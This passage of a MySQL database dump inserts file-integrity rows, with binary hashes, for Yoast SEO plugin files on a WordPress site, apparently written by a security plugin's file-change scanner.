('ò#ãžÐmÇX8¸›+ËŠÜµ', 'wp-content/plugins/wordpress-seo/src/exceptions/oauth/tokens/empty-token-exception.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/exceptions/oauth/tokens/empty-token-exception.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '÷4qóÛkr‰DÈXæ"]¬', 'èC¬`än)é‚w–14žïKÚHâ©-²§_úa¦Õ	=', '', 0, '?'),
('u{õÆËÛê\0­Dã¿°Œ', 'wp-content/plugins/wordpress-seo/src/exceptions/oauth/tokens/failed-storage-exception.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/exceptions/oauth/tokens/failed-storage-exception.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '{çûý"\r+[º%Æ”–', 'ô)€+,–+äûLhþQÐ>{¡©†Gè»O+€ñl', '', 0, '?'),
('ò×…ü™Á$ŒT{8/f', 'wp-content/plugins/wordpress-seo/src/functions.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/functions.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'H±K€¤Jç;Ò–9my', '×­÷E\rö¦†üÁÊ>ŠÄ²Åã†Ê=+Ùt‰²6HJQ', '', 0, '?');
INSERT INTO `wpou_wffilemods` VALUES
('ûÏþËèÕ-F}eÞ8·	', 'wp-content/plugins/wordpress-seo/src/generated/assets/externals.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generated/assets/externals.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '²t,¹\\ÚÞVm NffL', ' ÷þ:šd-{Ö×åú}Õ¥mh%”.ÊˆBÒÃ>', '', 0, '?'),
('AXì\0©l»Î†7‹KBh', 'wp-content/plugins/wordpress-seo/src/generated/assets/languages.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generated/assets/languages.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '£ÐÁ´rrÖ\r.A¾ZÅË', '"ŸÆœ“&‚Ç[ÎülÅô&Z1® _LÐSè"—}Y1Îç', '', 0, '?'),
('ž ÃNl0<+éƒýox', 'wp-content/plugins/wordpress-seo/src/generated/assets/plugin.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generated/assets/plugin.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÆGÜ†3or|,''{=''à', ';1~÷ ðö\0:GøxÇ¨´Ô×¤pÊÌÒÎ\r¨×H"^', '', 0, '?'),
('Ÿ²iÒGµÈ”j#Äå)µ', 'wp-content/plugins/wordpress-seo/src/generated/container.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generated/container.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '7úÊfdwâ›AÛ‘#%p', 'Ð*#xâ°µaü:åÇ[Š‡^ÑälÞodÞ|’Õ‚v²', '', 0, '?'),
('Ñù)ûÄ\rW¶±è¹£×<O¬', 'wp-content/plugins/wordpress-seo/src/generators/breadcrumbs-generator.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generators/breadcrumbs-generator.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'àåZ‚Þ0€oÊàÆT', '4jÞ!$‹JR§0”âs4£qWµ”£BÅæÛ±4‹', '', 0, '?'),
('ùÞ¦?Ñéó%BþÍPRÿ', 'wp-content/plugins/wordpress-seo/src/generators/generator-interface.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generators/generator-interface.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'jX2‚ì	‹DÏr”', 'LBëvHÉÐ[óÒVÙdk”Ô¼}lE¾ì}ž', '', 0, '?'),
('€&Éƒ$ò…¯á(zÁáÅÆ', 'wp-content/plugins/wordpress-seo/src/generators/open-graph-image-generator.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generators/open-graph-image-generator.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '''eiÏK,	÷?Ûí,Ä', 'nâ4w:£KÑCÛAFMäÕTÓÚf2ÃÞ[', '', 0, '?'),
('—jHEâ4ïÔ5¦wn', 'wp-content/plugins/wordpress-seo/src/generators/open-graph-locale-generator.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generators/open-graph-locale-generator.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'àB+™œúëŽ9ù¢â', 'û7îYmR¯tèãæYª²V·×û·WJn%ƒûŽ›', '', 0, '?'),
('o”{Ñ±`¬r±º<³–“ê', 'wp-content/plugins/wordpress-seo/src/generators/schema/abstract-schema-piece.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generators/schema/abstract-schema-piece.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ô©ø§€œ4~awÞÈÆ', 'Ÿ''f†óqÙŸ²É‹ßˆ<Ew#Žo¨Öÿùû’¯Î‹‰', '', 0, '?'),
('ÂØÿZÏ@8p¶rŒ!ÕËæ', 'wp-content/plugins/wordpress-seo/src/generators/schema/article.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generators/schema/article.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'm¶úPîÖ#ñ2¢', '¼–c`jç˜šøÚwšJ¯ºdqÏ5l€•\nÅ·Â{ä', '', 0, '?'),
('KòÏ¥‘%:ò{ÍRj³ÔX', 'wp-content/plugins/wordpress-seo/src/generators/schema/author.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generators/schema/author.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‚¾lÁ8x±‚‚ÇÁ¸‘A\r', '”×ƒó>4†OËl•º/™09»’ÁÄpu±cé;ö', '', 0, '?'),
('µÜö 3cvåNÀ"Öð@ƒ', 'wp-content/plugins/wordpress-seo/src/generators/schema/breadcrumb.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generators/schema/breadcrumb.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¯›´`Ëyû”9:Ã\\£?', 'ú¹×ìÈ:IvŸ±»ÙT@ÜÆ\n¥ºg»\0Wð3XC', '', 0, '?'),
('UgÐ®AžD´eN\\Ú›Ð¼', 'wp-content/plugins/wordpress-seo/src/generators/schema/faq.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generators/schema/faq.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'WÎQf:¡&=ˆ×', 'O@°RìÈvÿöFæípðá½.E´‹?ùøð\ZüiKC', '', 0, '?'),
('1ÅüWÍŽ¹XD=-¤ –', 'wp-content/plugins/wordpress-seo/src/generators/schema/howto.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generators/schema/howto.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÁúwÛóMÚ»ÕÍ8*l ü', '"”ÀvƒÚðÀ†„?ÀŸ/!å«fôŸ:Ø‚ª·‹', '', 0, '?'),
('ßå]×?ÀtÓ(`Ñ85V', 'wp-content/plugins/wordpress-seo/src/generators/schema/main-image.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generators/schema/main-image.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Áœ&|òZø’jXã²£', 'çGNÖ¨ZÖKÿ+ÿ1wi¬Tw¥)Iý½ÖÂgÄ2n/', '', 0, '?'),
('Ö®ÃmNåGAøsÿî¬.', 'wp-content/plugins/wordpress-seo/src/generators/schema/organization.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generators/schema/organization.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '½çÞ¬I=ˆÈ&Ñ.)·¯¶', 'ªý~ÐmK¢t§ô×”H?$µŸey	Î¨QM·’7Àv', '', 0, '?'),
('7æ.Ê‹5°áÏ1³', 'wp-content/plugins/wordpress-seo/src/generators/schema/person.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generators/schema/person.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Þ/z¢<''Ö9ßÈÎRî¯', '\0ð9 ³8Ðð9 \ZÕzó?í]ÏöâóoÏÓFˆ“', '', 0, '?'),
('ñNbÄ“…p	\nÒð#?E', 'wp-content/plugins/wordpress-seo/src/generators/schema/webpage.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generators/schema/webpage.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Âpñj¾IBOõ†»§TÔ ', 'lŸ“Æl‰†1Xsœˆ)3²r$vÆi¤9+*…$', '', 0, '?'),
('M]½»Ž} wíã-›!ˆ', 'wp-content/plugins/wordpress-seo/src/generators/schema/website.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generators/schema/website.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '±órk}B8Œ±±U÷IÊm', '†[\0%Ý%\Z³\0§«^A…3aò­Ö\0œÉî3Ÿr£™', '', 0, '?'),
('jÊSö­ÿâ^p N	¿', 'wp-content/plugins/wordpress-seo/src/generators/schema-generator.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generators/schema-generator.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‡ø²äÛ¸4X_xÐ@gºº', 'ÂËÖC‚Ç‰Nò™œDLd¤EPÆãúmØÛÉW¦79', '', 0, '?'),
('ÂúŽ±Î Ú7ÆôÈD,ƒ', 'wp-content/plugins/wordpress-seo/src/generators/twitter-image-generator.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/generators/twitter-image-generator.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'š\0“ûj‘“?l-sL†ƒ', 'ÄÈ['' êRãÁ)Y|¡|˜à º˜±‘ËG§¨*š', '', 0, '?'),
('|?“mFôÈÍ2½Ë‰ùç', 'wp-content/plugins/wordpress-seo/src/helpers/aioseo-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/aioseo-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ùj›x_ì=0Þ ´øóÍ', 'æ`ÖT³LQÍ¨‚âˆœFÈÄõd\rŒ>Ì]t‡F*', '', 0, '?'),
('yiÃº\næ_Tz\\õ«ë»l', 'wp-content/plugins/wordpress-seo/src/helpers/asset-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/asset-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ']lú$·_ÌÚNLÔ*ÝsÆ', 'G¶Õ5wÉ1ÎäO¥æ×+Z.OË¦\n’+ÎÐF»;Ú', '', 0, '?'),
('Ló¸ Á,^\Z˜2±wá', 'wp-content/plugins/wordpress-seo/src/helpers/attachment-cleanup-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/attachment-cleanup-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ü''ÄÎwÙµŠtàŸ>@', 'HÉO3®ãaBµ_ãÖPjo#¨›£û\nÜbùð°Çu', '', 0, '?'),
('4ê&Q:Í£¦Ù™S\\&	Qa', 'wp-content/plugins/wordpress-seo/src/helpers/author-archive-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/author-archive-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'w#\rÂ¥ecì„?PqÖ?', 'ìpØ<Nk Oéu">·Åªæ¤GC˜Æµc²wå', '', 0, '?'),
('`“Úƒ›j‚ýeÎ&‚¼', 'wp-content/plugins/wordpress-seo/src/helpers/blocks-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/blocks-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Kp£­|k4ÎñCè|=/', 'œ·šÀF8ûËM7Tí{ß„qÙj«IPSøÒê', '', 0, '?'),
('Šs.ƒV!­ÉíXtÃ£s¡.', 'wp-content/plugins/wordpress-seo/src/helpers/capability-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/capability-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'òçþÌ–0iÈV±Ò‡ï', '&%Ë´õ­tñE;V²ô€s×ï‰Ì%Ò+2°ÇIjZ', '', 0, '?'),
('çÝâŸê¿©{þ•nÆöP÷', 'wp-content/plugins/wordpress-seo/src/helpers/crawl-cleanup-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/crawl-cleanup-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¢°­Ê¢g-½¶Êõ;á', 'YØA˜ã\Z\n·Žƒ\n†ß¬+~=Ç›>œluƒWó<', '', 0, '?'),
('†³ê+;–''@ÙG¤D°z', 'wp-content/plugins/wordpress-seo/src/helpers/curl-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/curl-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ê8á‡šcP¹…O£èE'' ', 'Û·R³ZS#½Í\nÖ÷ñÝ2)ATÀÎ''ßpþÆ;', '', 0, '?'),
('FÜx¦\Z4IËhGbC@¥†a', 'wp-content/plugins/wordpress-seo/src/helpers/current-page-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/current-page-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'é\nýNQM,z÷I;©Øž', '=âæ*¢RÚø4„¼8³¬¢ŒàMD†&!Mk†&2d', '', 0, '?'),
('j*Î\Z@–«‹ˆòw“´', 'wp-content/plugins/wordpress-seo/src/helpers/date-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/date-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'bßø	+{R\\Knl/N…P', 'Ì9˜qm_ùÃáD¥Ieô„å²ºR6Ë“‰h`ç©åÏ¹›', '', 0, '?'),
('âì˜‰\r“íåÝn²	½è', 'wp-content/plugins/wordpress-seo/src/helpers/environment-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/environment-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '™@#ýj×ˆsð d3{', '~?\ZL‡Þ(o%Ê“ˆÓ^—÷÷};—”ï+B Y%', '', 0, '?'),
('*WùiM¶¦²úrþ', 'wp-content/plugins/wordpress-seo/src/helpers/first-time-configuration-notice-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/first-time-configuration-notice-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ë˜Ù¢ó{!Àœ—Ošc@', '˜´‚X®U-£õ÷ê±„.b#Tn©uX>¨•“•', '', 0, '?'),
('£Už\\L†3à.lVì?t»', 'wp-content/plugins/wordpress-seo/src/helpers/home-url-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/home-url-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '÷WþÄ„FÃz¿Ö¡', 'hTWNB“ûZG§™ò®€”ñØvÑRñfëy\Z¦eäA', '', 0, '?'),
('yuh±†m\06÷„2î6ïv\0', 'wp-content/plugins/wordpress-seo/src/helpers/image-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/image-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '€ÉãW	!?XGÝkö´´a', 'öYÿhF¦L]RüóÐEX=á‡œãÎ(¬.÷;Áø=¸Äz', '', 0, '?'),
('Z>ÈnØ/qû–Nb´', 'wp-content/plugins/wordpress-seo/src/helpers/import-cursor-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/import-cursor-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '=àå"xæÝ÷ÆÀú¶žÅ#œ', 'º³\\Ôµ2âÚËšÄàëfwÛSïjD0¬sà·}Q', '', 0, '?'),
('ækO€Ç›©?((ˆÍ†', 'wp-content/plugins/wordpress-seo/src/helpers/import-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/import-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'm§Ô¿£·,)U¾X?%ÿ6', ' l°fDò±ps#\r×&ï…@?`J7QÛºîŸ VA(', '', 0, '?'),
('nÉFš`np~vuTkÜ÷K', 'wp-content/plugins/wordpress-seo/src/helpers/indexable-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/indexable-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '($Ý™ç®\nv…ïŸ', 'Cò"ÒÓXšÛ÷Y.ä‡{4})f 	d˜ˆnçjP·úš', '', 0, '?'),
('˜\\fEÑ\no‰øˆõªGT', 'wp-content/plugins/wordpress-seo/src/helpers/indexable-to-postmeta-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/indexable-to-postmeta-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '1h''9½v¸­óbŽn‹;¸', 'k”Kô/áºtS/\rÍYè4Ô…rÐ®	?‰“', '', 0, '?'),
('çùŠèéâ)0{ñ¤Ïx›', 'wp-content/plugins/wordpress-seo/src/helpers/indexing-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/indexing-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÞÅ×–Û*:}bH³áQ', '¥‘Nplë…/J5O"¦Å‚æTC\ZÓÞ´ù)‰É®\nÕ™k‘', '', 0, '?'),
('ÔÞÌŸ‡¼:H­Cbg*I;', 'wp-content/plugins/wordpress-seo/src/helpers/language-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/language-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Û?aÿ4b‘¸ÀÑ,bw£H', 'žÊø{Çä)ÿ.ß,$wÁS—¡Ùœ0„õoâ«–êåüÎ)è', '', 0, '?'),
('¤Loª¦Ëƒ¿ZhÉ{®', 'wp-content/plugins/wordpress-seo/src/helpers/meta-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/meta-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Á=8V(•cåJlžCWýµ', 'u°ÉFBÀâº´¯¸…Ý|†iÅä„ƒÞ>‹i]ý•M', '', 0, '?'),
('^á¬Í	ñÖË0ã\\îšO&', 'wp-content/plugins/wordpress-seo/src/helpers/notification-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/notification-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '9Ïrè\\‚Cÿ¨ÀOé¿Û', '”©`Bbè.¿ó4+qiU-yT3oª‚Å¨¶lJ¢\n†£', '', 0, '?'),
('¨àre}/±DÛêå’>', 'wp-content/plugins/wordpress-seo/src/helpers/open-graph/image-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/open-graph/image-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '"bTéüpZVÂ³Sžªš=', ',¢g»áï·›rf€r<uWÑ†™œú\0+7‚õÔZ', '', 0, '?'),
('­˜8\ZÚ1\nÈ‰=\n¨ÿ{‘', 'wp-content/plugins/wordpress-seo/src/helpers/open-graph/values-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/open-graph/values-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '#š´?Ú&×|à\Zt«Ñ', 'Õà!ï¡[ø¯D¼Ò‰Œ­Üž¥Yº]Oä#*æ£`V', '', 0, '?'),
('(ðZbcÄ²²Ý6p·"$ì¸', 'wp-content/plugins/wordpress-seo/src/helpers/options-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/options-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'T‡ýíŽ!%(sŽÅ[Û', 'iA£€8é%¤è û4âôêT3Ú_¦ìÏ©¨aUò„\rÒ', '', 0, '?'),
('çé»ð5RÍqñ¤\ZXÈ', 'wp-content/plugins/wordpress-seo/src/helpers/pagination-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/pagination-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '×ú6Ùjï%Š›', 'eÐé3äçs^ÿl`žÖæbö—òÔ8!Ð£6€Ü', '', 0, '?'),
('§kŠ3øª®ñ…èÚj8úy', 'wp-content/plugins/wordpress-seo/src/helpers/permalink-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/permalink-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ìòbKÆ÷ »=f†Ò{™Ð”', '`´‹Ô»i	ç†Ôc''ÁÔ­§é5¨RÃù±ðKMOe', '', 0, '?'),
('ÏÂ\n\0Û0{ÿÂšñ‚ë', 'wp-content/plugins/wordpress-seo/src/helpers/post-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/post-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '™Ô=‚}\\¢''U¤<¸Ê}M$', 'Ö‘>)÷WÈ0ðm Ø¼ø(÷ïg8í.®›Ÿ§ä', '', 0, '?'),
('\rè÷±»æ´Ç´TDµ‡pœ', 'wp-content/plugins/wordpress-seo/src/helpers/post-type-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/post-type-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'î$ûŒ=±bè”xý0,', 'ŠIE[rV<~FÒwÏüË¾*kÒÏºF!Kýx¿TW"gˆ', '', 0, '?'),
('Õk"ôñOŠ„§$N)Š$¸', 'wp-content/plugins/wordpress-seo/src/helpers/primary-term-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/primary-term-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‹~VÑÑÁšn°q/”ýÚ1', 'r8Ã¦ÙeYÊkîâ5aÎnÕ\ZÛ[€•UÎ,T^¢‹^e1', '', 0, '?'),
('à>¾]*aÕà˜õRóã', 'wp-content/plugins/wordpress-seo/src/helpers/product-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/product-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'QËQ6­I~p€`<œúd', '¢³fEÜ÷(¿hG®Þ1ÖÍã¨Äžcä‰Ây¹‹|æ', '', 0, '?'),
('.úàáÃQ˜B4¸ÄÕ¢ag', 'wp-content/plugins/wordpress-seo/src/helpers/redirect-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/redirect-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ')sZ}¾ýod—9" ­-D¼', 'ÚðLI¡,þp¤Ôp[,Ë-’"zùYÀLu×Hý¸ÛØ¨—', '', 0, '?'),
('OjÀsOí *B.¶s­‰Õ', 'wp-content/plugins/wordpress-seo/src/helpers/request-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/request-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '·$Ê¼aJl,Ñy¬', 'í®îÙJoIÌvlªá‹Æ°äz\n(·YnÍÿƒ•!«#', '', 0, '?'),
('°5Žº8Š»ùT5úÚ-', 'wp-content/plugins/wordpress-seo/src/helpers/require-file-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/require-file-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '£þnÙz¬2M4Ùþ¨ÒÑ', '€²¢.ék‹“‹‰Ä=@[9¸W©¤P+|§“¿8', '', 0, '?'),
('zl,sWá6¤uDÐWÑµú', 'wp-content/plugins/wordpress-seo/src/helpers/robots-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/robots-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '% \\À¶¼QX§¼pÌCÃ', '¤:µÞ©{E“ÇéÅûP1ŠuÑŒúRà8Ûfg+ÉïÞ˜Úy', '', 0, '?'),
('!DðßüM÷°g`n¿GX', 'wp-content/plugins/wordpress-seo/src/helpers/robots-txt-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/robots-txt-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '”×oåŽÿðË-¢zû', 'É\rùà|]GEJ›1–wäwÂ}gŒ©9¸E¯ÑÙ†£ò', '', 0, '?'),
('w˜Ü''®\ZõûîÁº/ü©³‘', 'wp-content/plugins/wordpress-seo/src/helpers/sanitization-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/sanitization-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '±8´ô+ôd}ÉUP', 'fiø‚8ÜSŸ‹Ò¥ŠøzTŒ¨–Édà"w»''ÙqÎ4', '', 0, '?'),
('3dÉÎ«ÕjK®<u¥ãc!w', 'wp-content/plugins/wordpress-seo/src/helpers/schema/article-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/schema/article-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '0š\rºµâF\\oÊî\nv', '”¶Mf†}Då}Tg¨¶{Ñ$y6Âª‘\n‡wà\\™…bä+', '', 0, '?'),
('ö§5ÆÓF—ÁbA«', 'wp-content/plugins/wordpress-seo/src/helpers/schema/html-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/schema/html-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '½þ¨JT©«ó$w£RÙÍZ', '®Câ¯82Z''N„C™öÒc)wÇô7pÅ¿ÛÑ”/', '', 0, '?'),
('ÆƒEG~¯üÔ»ç|', 'wp-content/plugins/wordpress-seo/src/helpers/schema/id-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/schema/id-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ú<¹@ÊñaÏè£.ƒE', 'Ôþ]¥yÞômÑKMÂª¶\\Ú¸gâÊ˜NK¿ØÉÓ™', '', 0, '?'),
('4V6¯£uf	ˆƒ¥J Kd', 'wp-content/plugins/wordpress-seo/src/helpers/schema/image-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/schema/image-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\\MæSÂ£ç‡ÜÄÃ… ŠÇ', '’8À•rœG''AÿÇrÞ=¸·6šeˆõÀeRÍÊ;¶‚\058', '', 0, '?'),
('OÅÚºü^ê8´Kqú–§', 'wp-content/plugins/wordpress-seo/src/helpers/schema/language-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/schema/language-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\\·.Ð@äÓÊ2ý‹‡6w', '§| Ù\nßÌ\\T÷ïÔˆ5^Ð“>hÁË…q=³B', '', 0, '?'),
('™\r¤‹%»A}±* ó·çV', 'wp-content/plugins/wordpress-seo/src/helpers/schema/replace-vars-helper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/helpers/schema/replace-vars-helper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'wtµC-„÷¹–o5îé', '<7ú>ÝËÊ˜—ÑÀO‹ÕykyM‚°AÖå&]åÍ', '', 0, '?'),
